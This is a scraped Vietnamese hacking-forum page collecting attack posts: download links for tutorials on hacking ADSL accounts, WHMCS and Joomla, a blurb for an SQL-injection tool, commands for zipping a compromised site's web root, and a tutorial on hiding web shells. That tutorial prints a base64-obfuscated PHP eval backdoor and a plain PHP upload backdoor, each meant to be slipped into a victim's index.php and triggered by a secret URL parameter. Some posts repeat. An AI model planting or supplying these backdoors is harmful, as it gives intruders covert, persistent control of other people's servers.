Hiện tại đang có 6 level theo mức độ từ dễ đến khó:
http://www.zixem.altervista.org/
[TUT] Hack Account ADSL VNPT [8/7/2012]
TUT này nhìn sơ thì có vẻ k có gì nguy hiểm... nhưng nếu chúng ta
biết cách thì có thể đổ cmd vào đó... và dùng thêm dyndns để cập nhật ip
.. (nếu victim có dis ra thì Ip sẽ thay đổi)
TUT này có thể áp dụng cho cả FPT
Link: http://www.mediafire.com/?7h955j77ge094ew
TUT này k có gì đặc sắc .. những ai chưa biết thì có thể xem để biết
thêm
Xem Thêm
jSQL : Java GUI for database Injection
An easy to use SQL injection tool for retrieving database informations from a distant server.
jSQL Injection features:
jSQL Injection features:
- GET, POST, header, cookie methods
- visual, errorbase, blind algorithms
- automatic best algorithms detection
- data retrieving progression
- proxy setting
Xem Thêm
Lệnh zip code trên shell
Yêu cầu folder cần zip bằng lệnh chmod default 755 nhé
Command
zip -r -9 file_name.zip [path]
vd: zip -r -9 kechocgianvn.zip /home/user/public_html
=> web nó có cái gì thì zip nguyên cả đám. mình thường xài lệnh này
Tar
tar -cvf file_name.tar [path]
Gz
tar -zcvf file_name.tar.gz [path]
Trong đó [path] là đường dẫn tới user hoặc folder nhé
Command
zip -r -9 file_name.zip [path]
vd: zip -r -9 kechocgianvn.zip /home/user/public_html
=> web nó có cái gì thì zip nguyên cả đám. mình thường xài lệnh này
Tar
tar -cvf file_name.tar [path]
Gz
tar -zcvf file_name.tar.gz [path]
Trong đó [path] là đường dẫn tới user hoặc folder nhé
Xem Thêm
Hack WHMCS
ut by X-T
Anh X-T nhờ Black post dùm ^_^.
ACE trên VHB coi rồi học theo nhá chứ black cũg chưa down về xem
.
Link : http://www.mediafire.com/?ykptlrqa5gfx2md
Nguồn VHB
Anh X-T nhờ Black post dùm ^_^.
ACE trên VHB coi rồi học theo nhá chứ black cũg chưa down về xem
.Link : http://www.mediafire.com/?ykptlrqa5gfx2md
Nguồn VHB
Xem Thêm
[TUT] Khai thác Bug Joomla 1.6,1.7,2.5.0 và 2.5.2
Khai thác Bug Joomla 1.6,1.7,2.5.0 và 2.5.2
Download
http://www.mediafire.com/?h7h16yg34w9jhpl
Xem Thêm
Tut giấu shell
Mọi người thấy hay thì cho em tí tín dụng để vào Family nhé 
Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.
Vậy giấu shell làm sao để admin khó biết ?
Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...
Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng
Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:
Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika
========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó
if($_GET['id']=='hk')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
nếu chèn vô index sẽ là
index.php?id=hk
sẽ thấy from upload
Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.
Vậy giấu shell làm sao để admin khó biết ?
Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...
Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng
Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:
Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));
Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika
========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
